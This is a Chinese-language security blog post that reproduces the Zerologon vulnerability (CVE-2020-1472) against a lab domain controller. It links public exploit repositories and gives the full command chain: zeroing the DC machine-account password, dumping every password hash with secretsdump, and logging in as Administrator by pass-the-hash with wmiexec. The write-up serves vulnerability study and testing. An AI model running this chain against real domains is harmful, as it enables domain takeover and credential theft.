<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  <title>域内提权CVE-2020-1472 | WLSMILE Blog</title>
  <meta name="keywords" content=" 漏洞复现 ">
  <meta name="description" content="域内提权CVE-2020-1472 | WLSMILE Blog">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="CVE-2020-1472 2020年08月12日， 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告，该漏洞编号为 CVE-2020-1472，漏洞等级：严重，漏洞评分：10分。攻击者通过NetLogon（MS-NRPC），建立与域控间易受攻击的安全通道时，可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程">
<meta name="keywords" content="漏洞复现">
<meta property="og:type" content="article">
<meta property="og:title" content="域内提权CVE-2020-1472">
<meta property="og:url" content="https://luckdogiii.github.io/2020/12/01/14/index.html">
<meta property="og:site_name" content="WLSMILE Blog">
<meta property="og:description" content="CVE-2020-1472 2020年08月12日， 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告，该漏洞编号为 CVE-2020-1472，漏洞等级：严重，漏洞评分：10分。攻击者通过NetLogon（MS-NRPC），建立与域控间易受攻击的安全通道时，可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://luckdogiii.github.io/images/14/1.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/14/2.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/14/3.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/14/4.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/14/5.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/14/6.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/14/7.png">
<meta property="og:updated_time" content="2020-12-03T08:51:28.580Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="域内提权CVE-2020-1472">
<meta name="twitter:description" content="CVE-2020-1472 2020年08月12日， 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告，该漏洞编号为 CVE-2020-1472，漏洞等级：严重，漏洞评分：10分。攻击者通过NetLogon（MS-NRPC），建立与域控间易受攻击的安全通道时，可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程">
<meta name="twitter:image" content="https://luckdogiii.github.io/images/14/1.png">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0"></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js"></script>

<script src="/js/iconfont.js?v=1.1.0"></script>

</head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value>
  <input class="theme_blog_path" value>
  <input id="theme_shortcut" value="true">
</div>


<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/" class="avatar_target">
    <img class="avatar" src="/img/avatar.jpg" />
</a>
<div class="author">
    <span>WLSMILE</span>
</div>

<div class="icon">
    
        
        <a title="rss" href="/atom.xml" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-rss"></use>
                </svg>
            
        </a>
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
        <a title="qq" href="http://wpa.qq.com/msgrd?v=3&uin=1102528985&site=qq&menu=yes" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-qq"></use>
                </svg>
            
        </a>
        
    
        
        <a title="kugou" href="https://www.kugou.com/" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-kugou"></use>
                </svg>
            
        </a>
        
    
        
        <a title="neteasemusic" href="https://music.163.com/#/user/home?id=88151013" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-neteasemusic"></use>
                </svg>
            
        </a>
        
    
</div>




<ul>
    <li><div class="all active" data-rel="All">All<small>(14)</small></div></li>
    
        
            
            <li><div data-rel="Linux">Linux<small>(2)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="Web安全">Web安全<small>(3)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="其他">其他<small>(5)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="内网">内网<small>(3)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="工具">工具<small>(1)</small></div>
                
            </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
    
    
    
    
    </div>
    <div><a class="about  hasFriend  site_url"  href="/about">About</a><a style="width: 50%"  class="friends">Friends</a></div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="14">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        Links
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://yelog.org/">叶落阁</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">All</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" />
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Linux</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sql server</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sqlmap</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>代理</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>代理 password:klforever.cn</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>内网渗透</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>提权</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>漏洞利用</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>漏洞复现</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>端口信息</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        <a  class="All 内网 "
           href="/2020/12/01/14/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="域内提权CVE-2020-1472">域内提权CVE-2020-1472</span>
            <span class="post-date" title="2020-12-01 21:18:55">2020/12/01</span>
        </a>
        
        <a  class="All 内网 "
           href="/2020/11/30/13/"
           data-tag="内网渗透,代理"
           data-author="" >
            <span class="post-title" title="内网穿透-FRP流量改造">内网穿透-FRP流量改造</span>
            <span class="post-date" title="2020-11-30 20:16:00">2020/11/30</span>
        </a>
        
        <a  class="All 内网 "
           href="/2020/09/29/12/"
           data-tag="内网渗透"
           data-author="" >
            <span class="post-title" title="内网渗透之平台搭建">内网渗透之平台搭建</span>
            <span class="post-date" title="2020-09-29 18:46:12">2020/09/29</span>
        </a>
        
        <a  class="All 其他 "
           href="/2019/11/06/11/"
           data-tag="漏洞利用,端口信息"
           data-author="" >
            <span class="post-title" title="端口信息及漏洞利用总结（转）">端口信息及漏洞利用总结（转）</span>
            <span class="post-date" title="2019-11-06 20:22:31">2019/11/06</span>
        </a>
        
        <a  class="All 其他 "
           href="/2019/10/15/10/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="致远 OA A8远程Getshell">致远 OA A8远程Getshell</span>
            <span class="post-date" title="2019-10-15 16:55:26">2019/10/15</span>
        </a>
        
        <a  class="All 其他 "
           href="/2019/10/15/9/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="泛微OA远程代码执行">泛微OA远程代码执行</span>
            <span class="post-date" title="2019-10-15 16:46:35">2019/10/15</span>
        </a>
        
        <a  class="All Web安全 "
           href="/2019/10/14/8/"
           data-tag="注入,sql server"
           data-author="" >
            <span class="post-title" title="SQL SERVER 注入（三）">SQL SERVER 注入（三）</span>
            <span class="post-date" title="2019-10-14 19:13:59">2019/10/14</span>
        </a>
        
        <a  class="All Web安全 "
           href="/2019/10/11/7/"
           data-tag="注入,sql server"
           data-author="" >
            <span class="post-title" title="SQL SERVER 注入（二）">SQL SERVER 注入（二）</span>
            <span class="post-date" title="2019-10-11 21:09:17">2019/10/11</span>
        </a>
        
        <a  class="All Web安全 "
           href="/2019/10/11/6/"
           data-tag="注入,sql server"
           data-author="" >
            <span class="post-title" title="SQL SERVER 注入（一）">SQL SERVER 注入（一）</span>
            <span class="post-date" title="2019-10-11 10:28:47">2019/10/11</span>
        </a>
        
        <a  class="All Linux "
           href="/2019/10/09/5/"
           data-tag="提权,Linux"
           data-author="" >
            <span class="post-title" title="Linux提权（二）">Linux提权（二）</span>
            <span class="post-date" title="2019-10-09 20:10:07">2019/10/09</span>
        </a>
        
        <a  class="All Linux "
           href="/2019/10/09/4/"
           data-tag="提权,Linux"
           data-author="" >
            <span class="post-title" title="Linux提权（一）">Linux提权（一）</span>
            <span class="post-date" title="2019-10-09 08:31:52">2019/10/09</span>
        </a>
        
        <a  class="All 其他 "
           href="/2019/10/08/2/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="phpstudy远程代码执行复现">phpstudy远程代码执行复现</span>
            <span class="post-date" title="2019-10-08 20:31:10">2019/10/08</span>
        </a>
        
        <a  class="All 工具 "
           href="/2019/10/08/1/"
           data-tag="sqlmap"
           data-author="" >
            <span class="post-title" title="SQLMAP使用总结">SQLMAP使用总结</span>
            <span class="post-date" title="2019-10-08 15:13:47">2019/10/08</span>
        </a>
        
        <a  class="All 其他 "
           href="/2019/09/11/3/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="RDP漏洞CVE-2019-0708复现">RDP漏洞CVE-2019-0708复现</span>
            <span class="post-date" title="2019-09-11 20:13:47">2019/09/11</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>
    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-14" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">域内提权CVE-2020-1472</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="内网">内网</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color5">漏洞复现</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            Created At : <time class="date" title='Updated At: 2020-12-03 16:51:28'>2020-12-01 21:18</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            Views 👀 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#CVE-2020-1472"><span class="toc-text">CVE-2020-1472</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#影响版本"><span class="toc-text">影响版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#复现"><span class="toc-text">复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#首先在进入内网环境下获取到域控服务器的NetBIOS名称"><span class="toc-text">首先在进入内网环境下获取到域控服务器的NetBIOS名称</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#检测目标是否能够利用此漏洞"><span class="toc-text">检测目标是否能够利用此漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#将域控服务器中的机器账户密码打空"><span class="toc-text">将域控服务器中的机器账户密码打空</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#获取目标机器中所有用户的hash"><span class="toc-text">获取目标机器中所有用户的hash</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#使用Administrator用户登陆de1ay域"><span class="toc-text">使用Administrator用户登陆de1ay域</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="CVE-2020-1472"><a href="#CVE-2020-1472" class="headerlink" title="CVE-2020-1472"></a>CVE-2020-1472</h2><blockquote>
<p>2020年08月12日， 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告，该漏洞编号为 CVE-2020-1472，漏洞等级：严重，漏洞评分：10分。<br>攻击者通过NetLogon（MS-NRPC），建立与域控间易受攻击的安全通道时，可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。<br>对此，360CERT建议广大用户及时为各Windows Server操作系统安装最新相关补丁。与此同时，请做好资产自查以及预防工作，以免遭受黑客攻击。</p>
</blockquote>
<h2 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h2><pre><code>Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)</code></pre><h2 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h2><p>EXP：<br><a href="https://github.com/dirkjanm/CVE-2020-1472" target="_blank" rel="noopener">https://github.com/dirkjanm/CVE-2020-1472</a><br><a href="https://github.com/SecureAuthCorp/impacket" target="_blank" rel="noopener">https://github.com/SecureAuthCorp/impacket</a><br><a href="https://github.com/SecuraBV/CVE-2020-1472/" target="_blank" rel="noopener">https://github.com/SecuraBV/CVE-2020-1472/</a></p>
<p>靶机ip：192.168.21.109 （win server 2012 r2）</p>
<h3 id="首先在进入内网环境下获取到域控服务器的NetBIOS名称"><a href="#首先在进入内网环境下获取到域控服务器的NetBIOS名称" class="headerlink" title="首先在进入内网环境下获取到域控服务器的NetBIOS名称"></a>首先在进入内网环境下获取到域控服务器的NetBIOS名称</h3><pre><code>nbtstat -A DC_IP</code></pre><p><img src="/images/14/1.png" alt></p>
<h3 id="检测目标是否能够利用此漏洞"><a href="#检测目标是否能够利用此漏洞" class="headerlink" title="检测目标是否能够利用此漏洞"></a>检测目标是否能够利用此漏洞</h3><pre><code>python .\zerologon_tester.py DC 192.168.21.109</code></pre><p><img src="/images/14/2.png" alt></p>
<h3 id="将域控服务器中的机器账户密码打空"><a href="#将域控服务器中的机器账户密码打空" class="headerlink" title="将域控服务器中的机器账户密码打空"></a>将域控服务器中的机器账户密码打空</h3><pre><code>python .\cve-2020-1472-exploit.py DC 192.168.21.109</code></pre><p><img src="/images/14/3.png" alt></p>
<h3 id="获取目标机器中所有用户的hash"><a href="#获取目标机器中所有用户的hash" class="headerlink" title="获取目标机器中所有用户的hash"></a>获取目标机器中所有用户的hash</h3><pre><code>python .\secretsdump.py de1ay.com/DC$@192.168.21.109 -no-pass</code></pre><p><img src="/images/14/4.png" alt></p>
<h3 id="使用Administrator用户登陆de1ay域"><a href="#使用Administrator用户登陆de1ay域" class="headerlink" title="使用Administrator用户登陆de1ay域"></a>使用Administrator用户登陆de1ay域</h3><pre><code>python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24 de1ay.com/Administrator@192.168.21.109</code></pre><p><img src="/images/14/5.png" alt></p>
<p>这个Hash也可解出来<br><img src="/images/14/6.png" alt><br><img src="/images/14/7.png" alt><br>后续恢复密码<br><a href="https://www.cnblogs.com/Yang34/p/13678632.html" target="_blank" rel="noopener">https://www.cnblogs.com/Yang34/p/13678632.html</a></p>
<p>具体原理<br><a href="https://blog.csdn.net/smellycat000/article/details/108633744" target="_blank" rel="noopener">https://blog.csdn.net/smellycat000/article/details/108633744</a></p>

      
       
    </div>
</article>







    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2016-2020 wlsmile
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
